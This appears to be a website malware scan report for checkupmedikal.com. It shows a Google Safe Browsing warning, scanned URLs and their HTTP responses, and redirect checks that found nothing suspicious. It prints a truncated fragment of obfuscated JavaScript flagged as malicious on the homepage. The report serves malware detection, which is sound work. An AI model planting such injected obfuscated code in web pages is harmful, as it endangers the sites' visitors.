Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=checkupmedikal.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://checkupmedikal.com/ | 200 OK Content-Length: 15859 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var var1=true;var var2=10;var2++;var var6=0.0025;if(var6==null){var var5=0.0123;if(var5<0.0104){var var4=1819;if(var4==14){var var3='mib'}}}var var7=0.017;function per(str,shift){var var4,ret,pos,var1,var3,ch,len,ext,sh,var5,ich,var2,cnt2,var6,cnt1,sux,ch;for(var var1=0;var1<9;var1++){var var2=14;var2++;var var4=1209;if(var4==21){var var3={fub:5}}}var var7=1107;if(var7<0.001){var var5=30;var5-=0.022;var var6=5685;var6--}var var5=57;var var8=0;do{var var10=29;if(var10!=7170){var var9=13; Antivirus reports:
| ||
http://www.hitpaylas.net/online.php?domain=checkupmedikal.com&kenar=1&kenar_renk=333333&genislik=150&zemin_renk=CCFF00 | 500 Can't connect to www.hitpaylas.net:80 Content-Length: 192 Content-Type: text/plain | clean |
http://www.hitpaylas.net/test404page.js | 500 Can't connect to www.hitpaylas.net:80 Content-Length: 192 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: checkupmedikal.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 19:45:30 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 15859
Content-Type: text/html
Last-Modified: Wed, 26 Sep 2012 19:32:32 GMT
...15859 bytes of data.
GET / HTTP/1.1
Host: checkupmedikal.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 19:45:30 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 15859
Content-Type: text/html
Last-Modified: Wed, 26 Sep 2012 19:32:32 GMT
...15859 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: checkupmedikal.com
Referer: http://www.google.com/search?q=checkupmedikal.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: checkupmedikal.com
Referer: http://www.google.com/search?q=checkupmedikal.com
Result:
The result is similar to the first query. There are no suspicious redirects found.